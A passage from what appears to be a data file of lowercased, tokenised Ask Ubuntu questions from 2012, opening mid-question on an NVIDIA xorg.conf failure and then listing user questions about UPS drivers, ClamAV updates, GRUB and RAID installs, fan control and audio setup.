parm : nvreg_modifydevicefiles : int parm : nvreg_devicefileuid : int parm : nvreg_devicefilegid : int parm : nvreg_devicefilemode : int parm : nvreg_remaplimit : int parm : nvreg_updatememorytypes : int parm : nvreg_initializesystemmemoryallocations : int parm : nvreg_usevbios : int parm : nvreg_rmedgeintrcheck : int parm : nvreg_usepageattributetable : int parm : nvreg_enablemsi : int parm : nvreg_mapregistersearly : int parm : nvreg_registerforacpievents : int parm : nvreg_registrydwords : charp parm : nvreg_rmmsg : charp parm : nvreg_nvagp : int my xorg.conf looks like section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen1 '' 0 0 inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` record '' load `` dri '' load `` glx '' load `` extmod '' load `` dbe '' load `` dri2 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` dri '' # [ < bool > ] # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` fallbackdebug '' # [ < bool > ] # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` shadow '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` hwcursor '' # [ < bool > ] # option `` noaccel '' # [ < bool > ] # option `` shadowfb '' # [ < bool > ] # option `` videokey '' # < i > # option `` wrappedfb '' # [ < bool > ] # option `` glxvblank '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` pageflip '' # [ < bool > ] identifier `` card1 '' driver `` nvidia '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection this configuration currently fails ( if i change it to use screen0 with the intel driver i can get into lightdm just fine ) . when i have screen1/nvidia selected though i get the following error [ 175.767 ] x.org x server 1.10.4 release date : 2011-08-19 [ 175.767 ] x protocol version 11 , revision 0 [ 175.767 ] build operating system : linux 2.6.24-29-server i686 ubuntu [ 175.767 ] current operating system : linux ubuntu 3.0.0-16-generic # 29-ubuntu smp tue feb 14 12:49:42 utc 2012 i686 [ 175.767 ] kernel command line : boot_image=/boot/vmlinuz-3.0.0-16-generic root=uuid=8e2c55032c54e82b loop=/ubuntu/disks/root.disk ro quiet splash vt.handoff=7 [ 175.767 ] build date : 19 october 2011 05:09:41am [ 175.767 ] xorg-server 2:1.10.4-1ubuntu4.2 ( for technical support please see http : //www.ubuntu.com/support ) [ 175.767 ] current version of pixman : 0.22.2 [ 175.767 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 175.767 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 175.767 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sun mar 18 09:36:25 2012 [ 175.767 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 175.770 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 175.771 ] ( == ) serverlayout `` x.org configured '' [ 175.771 ] ( ** ) | -- > screen `` screen1 '' ( 0 ) [ 175.771 ] ( ** ) | | -- > monitor `` monitor1 '' [ 175.771 ] ( ** ) | | -- > device `` card1 '' [ 175.771 ] ( ** ) | -- > input device `` mouse0 '' [ 175.771 ] ( ** ) | -- > input device `` keyboard0 '' [ 175.771 ] ( == ) automatically adding devices [ 175.771 ] ( == ) automatically enabling devices [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 175.772 ] entry deleted from font path . [ 175.772 ] ( ** ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins , /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 175.772 ] ( ** ) modulepath set to `` /usr/lib/xorg/modules '' [ 175.772 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 175.772 ] ( ww ) disabling mouse0 [ 175.772 ] ( ww ) disabling keyboard0 [ 175.772 ] ( ii ) loader magic : 0x823ada0 [ 175.772 ] ( ii ) module abi versions : [ 175.772 ] x.org ansi c emulation : 0.4 [ 175.772 ] x.org video driver : 10.0 [ 175.772 ] x.org xinput driver : 12.3 [ 175.772 ] x.org server extension : 5.0 [ 175.773 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:2a42:1043:1af2 rev 7 , mem @ 0xfcc00000/4194304 , 0xd0000000/268435456 , i/o @ 0x0000cc00/8 [ 175.773 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0a74:1043:1af2 rev 162 , mem @ 0xfd000000/16777216 , 0xe0000000/268435456 , 0xfa000000/33554432 , i/o @ 0x0000dc00/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 175.773 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 175.773 ] ( ii ) `` extmod '' will be loaded . this was enabled by default and also specified in the config file . [ 175.773 ] ( ii ) `` dbe '' will be loaded . this was enabled by default and also specified in the config file . [ 175.773 ] ( ii ) `` glx '' will be loaded . this was enabled by default and also specified in the config file . [ 175.773 ] ( ii ) `` record '' will be loaded . this was enabled by default and also specified in the config file . [ 175.773 ] ( ii ) `` dri '' will be loaded . this was enabled by default and also specified in the config file . [ 175.773 ] ( ii ) `` dri2 '' will be loaded . this was enabled by default and also specified in the config file . [ 175.773 ] ( ii ) loadmodule : `` record '' [ 175.774 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 175.774 ] ( ii ) module record : vendor= '' x.org foundation '' [ 175.774 ] compiled for 1.10.4 , module version = 1.13.0 [ 175.774 ] module class : x.org server extension [ 175.774 ] abi class : x.org server extension , version 5.0 [ 175.774 ] ( ii ) loading extension record [ 175.774 ] ( ii ) loadmodule : `` dri '' [ 175.774 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 175.775 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 175.775 ] compiled for 1.10.4 , module version = 1.0.0 [ 175.775 ] abi class : x.org server extension , version 5.0 [ 175.775 ] ( ii ) loading extension xfree86-dri [ 175.775 ] ( ii ) loadmodule : `` glx '' [ 175.775 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 175.775 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 175.775 ] compiled for 1.10.4 , module version = 1.0.0 [ 175.775 ] abi class : x.org server extension , version 5.0 [ 175.775 ] ( == ) aiglx enabled [ 175.775 ] ( ii ) loading extension glx [ 175.775 ] ( ii ) loadmodule : `` extmod '' [ 175.775 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 175.776 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 175.776 ] compiled for 1.10.4 , module version = 1.0.0 [ 175.776 ] module class : x.org server extension [ 175.776 ] abi class : x.org server extension , version 5.0 [ 175.776 ] ( ii ) loading extension mit-screen-saver [ 175.776 ] ( ii ) loading extension xfree86-vidmodeextension [ 175.776 ] ( ii ) loading extension xfree86-dga [ 175.776 ] ( ii ) loading extension dpms [ 175.776 ] ( ii ) loading extension xvideo [ 175.776 ] ( ii ) loading extension xvideo-motioncompensation [ 175.776 ] ( ii ) loading extension x-resource [ 175.776 ] ( ii ) loadmodule : `` dbe '' [ 175.776 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 175.776 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 175.776 ] compiled for 1.10.4 , module version = 1.0.0 [ 175.776 ] module class : x.org server extension [ 175.776 ] abi class : x.org server extension , version 5.0 [ 175.776 ] ( ii ) loading extension double-buffer [ 175.776 ] ( ii ) loadmodule : `` dri2 '' [ 175.776 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 175.777 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 175.777 ] compiled for 1.10.4 , module version = 1.2.0 [ 175.777 ] abi class : x.org server extension , version 5.0 [ 175.777 ] ( ii ) loading extension dri2 [ 175.777 ] ( ii ) loadmodule : `` nvidia '' [ 175.777 ] ( ww ) warning , could n't open module nvidia [ 175.777 ] ( ii ) unloadmodule : `` nvidia '' [ 175.777 ] ( ii ) unloading nvidia [ 175.777 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 175.777 ] ( ee ) no drivers available . [ 175.777 ] fatal server error : [ 175.777 ] no screens found [ 175.777 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 175.777 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 175.777 ] i have tried typing in `` nvidia_current '' in the xorg.conf where it is looking for device name , but then it just fails and says it can not find the `` nvidiacurrent '' module . essentially i am not sure what i need to put in the xorg.conf to point to the nvidia_current module that my system knows is there . thanks for any help and if any more information is needed .
113994	trouble starting network ups tools with a eaton 3s ups	running an ubuntu server on a eaton 3s 700va ups . the eaton 's usb connection goes into my ubuntu server . i 'm trying to use nut to manage the ups . after sudo su'ing cat /etc/nut/ups.conf : [ eaton ] driver = usbhid-ups port = auto desc = `` eaton 3s '' upsdrvctl -t start network ups tools - ups driver controller 2.6.1 *** testing mode : not calling exec/kill 0.000000 0.000805 starting ups : eaton 0.000955 exec : /lib/nut/usbhid-ups -a eaton upsdrvctl start network ups tools - ups driver controller 2.6.1 network ups tools - generic hid driver 0.35 ( 2.6.1 ) usb communication driver 0.31 ca n't claim usb device [ 0463 : ffff ] : could not detach kernel driver from interface 0 : operation not permitted driver failed to start ( exit status=1 )
114000	how to update clamav definitions database ?	how can i update clam antivirus via the terminal ? i already have installed clamav , but i want to know how can i update the virus database .
114002	every time i logout , the skydome image gets replaced by the blue-white gradient . how do i solve this ?	i put up a skydome image for desktop cube , and it works perfectly . but everytime i log out , and log back in , it 's back to the default blue - white gradient . i even tried changing the colours to transperent so that it would'nt be seen . it changed ! but when i logged out , and then back in . it 's back to the blue-white gradient ! ! ! ! ! and when i check the settings , its still transparent ! ! ! ! ! !
114007	decent file manager with miller columns ?	is there a decent file manager with miller columns ? i found marlin and dolphin so far . i like marlin , but it 's seems quite buggy . dolphin i like not so much . it lets me choose between single and double click to open files , but if i choose double click , this also applies to folders in columns view . are there alternatives ? edit : columns view was removed from dolphin altogether .
114008	how to properly install chromium from zip and make it the default browser ?	since the chromium ppa is no longer maintained , for those of us preferring to use chromium over chrome , we have two options : build and install from source download either 'beta ' or daily builds ( in a zip file ) unfortunately for me , option 1 is overly complicated . i know how to compile most any other applications in ubuntu but i 've never been able to get chromium to build correctly . i am currently using option 2 . in chromium i have the chromium updater installed ( chromium updater from chrome web store ) . this gives me quick access to the most recent 64bit versions . once downloaded , i install to /home/myuser/opt/chrome-linux . from this directory i can run the chrome binary . it works perfectly except for the fact that i can not get it to act as my default browser . i 've tried , as root , installing the binary in /opt/chrome-linux/ with a symbolic link to the chrome binary in /usr/bin . unfortunately , this does n't work as a non root user . so my question is - how do i properly install a downloaded chromium zip build so that it 's listed as an option for the default browser ?
114010	thinkpad fan control via procfs	my thinkpad w500 used to crash sometimes under heavy load because the automatic control is not speeding up the fan far enough . but i was able to disengage the fan and let it run at full speed in ubuntu 10.10 . but this does not work in my new nice and shiny ubuntu 11.10 . have a glimpse at fan control device . % ls -l /proc/acpi/ibm/fan -rw-r -- r -- 1 root root 0 2012-03-18 15:46 /proc/acpi/ibm/fan % cat /proc/acpi/ibm/fan status : enabled speed : 3056 level : auto now become super user in a fresh and clean environment and send control sequence . % exec sudo env -i bash -l $ echo 'level disengaged ' > /proc/acpi/ibm/fan bash : echo : write error : invalid argument what did i miss ? thanks for suggests .
114012	problems downloading boot-repair	i upgraded my laptop and when i reboot it , i have problems with grub . i put the live cd and tried to download the boot-repair , by putting in the terminal sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install boot-repair it downloads everything but then , when i use dash to open it , it does n't appear in applications , where is it ?
114015	how do i back up thunderbird emails ?	how can i back up thuderbird 10.0.2 emails , etc to flash drive or external hard drive using ubuntu 10.10
114023	no monitor output after fresh install of 11.10 64-bit	i have a machine with a nvidia 8600gt graphics card and a crt monitor . previously , i have only used windows on it , and the graphics card seems to be working correctly in windows 7 . i booted up and installed ubuntu 11.10 amd64 from the livecd and the whole process worked perfectly . when i tried to boot off the hard disk for the first time , the output to the monitor switched off during the splash screen , and this happens consistently . i can ctrl-alt-f2 , so i tried an apt-get upgrade , which did n't help ; nor did apt-get install nvidia-current . there is nothing that looks relevant in dmesg . booting with the nomodeset option has no effect . following the answers in this similar thread , i tried apt-get purge nvidia-173 . both startx and service lightdm start just say the service is already running . does anyone know how to find out what the problem is ? i was wondering if it is just that ubuntu is trying to use a resolution that the monitor does n't support , but i ca n't find out how to change that from the command line .
114025	show in groups : nautilus	is it possible to enable `` show in groups '' option in nautilus ? this option is available in windows explorer and in dolphin .
114028	screen resolution for my monitor not listed	i just upgraded to ubuntu 11.10 oneiric ocelot . everything works fine except for the screen resolution for my monitor which is wrong . in the system settings i can change it but the one that goes with my monitor is not listed . in system info , the graphics driver is unknown . my graphics card is : sudo lshw -c video *-display description : vga compatible controller product : 82g33/g31 express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 10 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : fdf00000-fdf7ffff ioport : f400 ( size=8 ) memory : d0000000-dfffffff memory : fda00000-fdafffff
114029	how do i install ubuntu from a copied version of original ubuntu 11.10 ?	i copied ubuntu from its original cd version.. they way i did it was wrong..i copied the original cd to a folder in harddisk and burned it using nero to other cd.. and the cd doesnt boots by itself . and later i converted all into an iso img and wrote it to another cd after i red a blog.. there must be some bootable file missing from the cd i guess.. and i also tried the flash drive installation..nothing makes any difference.. its been 2 weeks..and im so tired of doing it.. am i hopeless ? ? without buying an ubuntu disk can i make this work ?
114032	ubuntu application to show calendar with week numbers	i would like to view a calendar for the current month , with each week having a week number against it . is there an application to do this ?
114035	fontconfig library not found while configure for building octave 3.6	i 'm trying to build octave 3.6.1 on my 64bit ubuntu 11.10 . i was able to fix all other warning messages from configure except this one : 'fontconfig library not found ' . i tried to install libfontconfig , but apt-get uses libfontconfig1 instead of libfontconfig . how can i let configure to use libfontconfig1 instead ? thanks .
114044	transmission stopped working , says it 's not installed even though it is	so transmission decided to randomly stop working . when i click on torrents transmission comes up as an option , but when i click ok nothing happens . when i go to the terminal and try to open transmission it tells me it 's not installed . it recommends i install it with sudo apt-get install transmission-gtk . when i do this it says something like `` transmission already newest version . '' so it 's installed , clearly . somebodddy help !
114047	nvidia geforce gt630m/gt640m/gt650m graphics card support ?	is the nvidia geforce gt630m/gt640m/gt650m graphics card supported in ubuntu 11.10 or ubuntu 12.04 ?
114052	unable to connect to windows vpn in ubuntu 11.10	i am very very new bie in the world of ubuntu . i have recently installed ubuntu 11.10 and i am not able to connect to windows vpn . when i login to windows 8 i am able to connect to vpn using default windows vpn connection . any help pointers ?
114053	how to give more ram to virtualbox on ubuntu than what its limited ?	i have 16gb of ram on my mac os x and i 'm running virtualbox and i want to know how if i want to give more than 4gb of ram that it 's limited like say i want to give 8 or more of my available ram ? will it be possible to do so ? thanks .
114056	ubuntu one sign in failure	i have just installed current version of ubuntu one on my windows xp laptop but can not sign in . sign in shows getting information message but returns `` ca n't encrypted password '' in red at the bottom of the window . any help appreciated , charlie .
114058	how to install burg on dual-boot windows 7 / ubuntu machine ?	i 'm relatively new to linux/ubuntu , but i 've set up my new machine as dual-boot with 11.10 and windows 7 . i 'd like to replace grub with burg to get a nice graphical boot menu . the machine is set up with two drives , with windows on the first drive ( /dev/sda ) and ubuntu on the second ( /dev/sdb ) . the bios is set to boot from the first drive ( as it was when i only had windows installed ) so when installing ubuntu , i selected /dev/sda as the location for the mbr . now i get the grub menu on starting the machine and can boot successfully into both os 's . i intended to install burg through super boot manager / burg manager , but /dev/sda does n't appear in the list of options . how to set this up given the configuration described above ?
114059	lubuntu : cant connect to wireless network	when i try to connect to my wireless network it just keeps on trying to connect and after a while it says i need to enter the password again . i searched many questions already on this site . but could not find a solution : ( i have lubuntu installed and on ubuntu it worked the first time right off the bat . so can anyone help me ?
114060	what is ~/.face ( binary ) ?	i just noticed this file , .face , in my home directory : -rw-r -- r -- 1 root root 14747 2012-01-07 01:35 .face never seen it or heard of it before , and google does n't seem to know either . anyone have any idea ? i 'm running 11.10 desktop x64 , clean installed right around the date of this file ( jan 7 , 2012 ) .
114063	open mbox file ?	how to open a mbox file ? mutt displays no mails when calling `` mutt -f sent.mbox '' . the mbox format is `` from '' without colon . is there any mbox viewer for linux ? thank you in advance .
114067	how do i access my music and documents from windows7 on ubuntu ?	how do i access my windows7 music library on ubuntu 11.10 ? i have just installed ubuntu and i wish to copy my music library from itunes to the banshee media player , i 'll gladly give more details if necessary . i 'm really new to linux as a whole so if you can please use layman 's terms .
114069	no wlan0 , intel corporation pro/wireless 3945abg	i have a hp nx7400 installed with xubuntu 11.10 . somehow the wireless does not work , i have read a lot of articles about this but i think i broke more then fixed thinks . when i do sudo lshw -c network , it returns : *-network unclaimed description : network controller product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:10:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : latency=0 resources : memory:84000000-84000fff memory:84001000-8400100f so i am lost and need help , any help is appreciated .
114074	30 w discharge and half the windows uptime	i 'm new to linux and i installed ubuntu 11.10 x64 . i got a hp envy 14 laptop ( i7 second gen ) and my batterytime is half the uptime i get in windows 7 . now i got 2hours and it discharges in 30w . in windows i get about 4-5 hours uptime . i have done some guides so i only use the integrated graphicscard . i ran powertop and pasted it here below , if someone can get something out of it.. seems strange with a lot of posts on 100 % . i dont know what to look for : / powertop 1.97 overview idle stats frequency stats device stats tunables the battery reports a discharge rate of 29.9 w usage device name 6.3 % cpu use 20.0 % display backlight 20.0 % display backlight 20.0 % display backlight 0.0 % audio codec hwc0d0 : idt 601.7 pkts/s network interface : wlan0 ( iwlagn ) 100.0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 5 100.0 % pci device : intel corporation xeon e3-1200/2nd generation core processor family pci express 100.0 % pci device : intel corporation xeon e3-1200/2nd generation core processor family pci express 100.0 % pci device : intel corporation xeon e3-1200/2nd generation core processor family pci express 100.0 % pci device : intel corporation 2nd generation core processor family integrated graphics cont 100.0 % pci device : intel corporation 6 series/c200 series chipset family mei controller # 1 100.0 % pci device : intel corporation 6 series/c200 series chipset family usb enhanced host control 100.0 % pci device : intel corporation 6 series/c200 series chipset family high definition audio con 100.0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 1 100.0 % pci device : nec corporation upd720200 usb 3.0 host controller 100.0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 8 100.0 % pci device : intel corporation 6 series/c200 series chipset family usb enhanced host control 100.0 % pci device : intel corporation 6 series/c200 series chipset family 6 port sata ahci controll 100.0 % pci device : ati technologies inc ni whistler [ amd radeon hd 6600m series ] 100.0 % pci device : intel corporation centrino advanced-n 6230 100.0 % pci device : atheros communications ar8151 v2.0 gigabit ethernet exit |
114076	ubuntu php5-fpm unix socket	i have ubuntu 11.10 and installed php5-fpm and i want to configure nginx . i want to use unix sockets instead of tcp sockets but i could n't find the /var/run/php5-fpm.sock i have looked also /tmp/php5-fpm.sock where is php5-fpm.sock file ? i also tried locate php5-fpm.sock but i could n't find anything . note : php5-fpm is working . i have started as a service http : //blog.bigdinosaur.org/wordpress-on-nginx/ http : //blog.nas-admin.org/ ? p=25
114078	i can not access anything after updating to latest version of ubuntu	i only have file , edit , bookmarks , go , help at the top of my screen so i can only access my documents . i can not access any programs or applications , including the ubuntu update centre and , most importantly , can not even shut down . all i can do is just switch the computer off because there is nowhere to click on . this is odd and i want to go back to the old ubuntu . thanks
114088	ubuntu and grub wo n't install to raid0 partition	i 'm at a complete loss , having searched all over the place and tried to get help on irc . i booted the installer from a usb drive , and began installation . when i detect disks , it asks me if i want to enable the detected raid array . i choose yes , because i have a raid0 set up in my motherboard 's bios raid driver ( which currently holds my windows7 installation and my ( now broken ) mbr ) . when i choose partition disks , it can see all partitions including those of win7 . i choose the free space and create a new partition automatically , everything in one partition . when i move on to install the system , normal or live , it tells me `` installation step failed '' without so much as a description or error . when i choose to install grub , it asks me to first complete `` install base system '' or `` install system '' . when i choose base system , it seems to copy or download files and then it fails while installing grub again . on that particular step , i get asked where i want to install the bootloader . /dev/mapper is the default input , but neither that or /dev/sda or sdb etc works . any help is much appreciated , i 'm clueless edit : i finished installation without bootloader , rebooted and got into grub rescue . then i used https : //help.ubuntu.com/community/grub2 # command_line_and_rescue_mode instructions , and upon running `` boot '' it send me to a prompt mentioning `` busybox '' . prompt is ( initramfs )
114094	installing ubuntu from usb over corrupted w7 install ?	okay , in my zeal to install ubuntu as primary os on a new netbook i seem to have fouled things up pretty badly . on first booting ( prior to w7 installation ) the netbook , i brainfarted and did n't hit f2 for bios ( to change boot order ) . i compounded this mistake pretty severely when i killed the netbook in the midst of windows setup . i seem to be stuck in some kind of in between hell now . trying to go back to windows installation fails but when i run ubuntu live session from usb , the install ubuntu 11.10 shortcut on the desktop is not working . that 's my set up ; here are my questions : 1 ) is there a way to reformat from the usb to fix this ? i do n't have anything to lose file-wise and i do n't care if i have to blow the windows installation files away . 2 ) if i ca n't reformat from the linux usb , how can i fix this without resorting to getting my hands on a windows image to boot from ? it seems like an especially cruel punishment that i should have to do that just to get rid of windows and install linux .
114098	increase windows partition in a working dualboot	i have a dualboot with precise and windows 7 , and the second partition has less space than the ubuntu one . the windows disk is almost full , so , is there a way to 'safely ' resize them ? does gparted mess with the windows partition ?
114099	sudo as other user and brasero	i 'm protecting application spaces by creating a new account for each application instance launched . i create a disabled-non-admin account ( no passwd set ) . then , i do this : xhost local : braseroinstance_01 gksudo -u braseroinstance_01 /usr/bin/brasero brasero fires up ! but , ca n't see the blank dvd . what is going on ? brasero message : please replace the disk with a supported cd or dvd . gnome-baker : can not see the blank dvd either .
114100	change lightdm session name entries for desktop environments ?	when using lightdm , sessions , ( not usernames ) are named in a way i would like to change , for example , ubuntu is unity 3d , and i would like to name it that way , the following to : ubuntu 2d to unity 2d . gnome to gnome shell . gnome fallback to gnome classic ( compiz ) . gnome fallback ( no effects ) to gnome classic ( light ) . is there any way to this ?
114102	how do i use samba in ubuntu server ?	i have ubuntu server running in virtualbox to which a directory is shared . i need to access this directory , probably even mount it , so that it 's easily accessible for me . when i had ubuntu desktop running in virtualbox in the same situation , i could access the folder simply by typing smb : //192.168.1.1/ into nautilus . i do n't know how to achieve this in server / terminal .
114109	translating with context	is there a way i can see the result of my work while i am translating ? it is difficult to translate without context . if i could see how my work will appear while i am doing it , translating is much easier . edit by oli : i understand this question to be from somebody who is translating an application . translators often only have a list of phrases to translate without being able to see where those phrases are used in the app . this person wants a way to quickly locate a string inside an application so they can understand the phrase better and provide the best possible translation .
114113	what 's the name of an application similiar to gnome-tweak tool ?	i have recently reinstalled ubuntu and ca n't remember the name of an application that was really useful . i remember it had a green icon and it appeared on the dash when i searched for `` gnome tweak '' or something similar . it was really great for configuring what each corner of the screen would trigger . i.e . show all applications , show desktop , etc.. anyone knows the name of that app ? thanks .
114114	all imported video is green in openshot	ubuntu 11.10 64bit nvidia graphics card : geforce gtx 580m/pci/sse2 openshot version : 1.4.2.1 all imported video has a green tinge , for example , people are green , etc . all video played back in every other app is fine . uninstalled/re-installed , same issue ... any ideas ? anyone else had this problem ?
114118	qjackctrl audio server starting . focusrite saffire pro40 card start and no sound	qjackctrl server is starting . then the fw active led of the soundcard turn on . i try listenning to a youtube video and i get no output sound . the card connection setup is working on windows . setup : ubuntu 11.10 x64/ qjackctrl/ubuntu studio controls/ focusrite saffire pro40 here the log from qjackctrl : 19:30:14.614 patchbay deactivated . 19:30:14.698 statistics reset . 19:30:14.735 alsa connection change . 19:30:14.977 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started 19:30:14.984 alsa connection graph change . 19:30:46.140 d-bus : jack server is starting ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : driver `` firewire '' selected sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : saving settings to `` /home/richard/.config/jack/conf.xml '' ... sun mar 18 19:30:44 2012 : starting jack server ... sun mar 18 19:30:44 2012 : jack server starting in non-realtime mode sun mar 18 19:30:44 2012 : [ 1m [ 31merror : can not lock down memory area ( can not allocate memory ) [ 0m can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started 19:30:46.552 d-bus : jack server was started ( org.jackaudio.service aka jackdbus ) . sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_ip 1_in' sun mar 18 19:30:46 2012 : new client 'firewire_pcm ' with pid 0 sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_ip 2_in' sun mar 18 19:30:46 2012 : graph reorder : new port 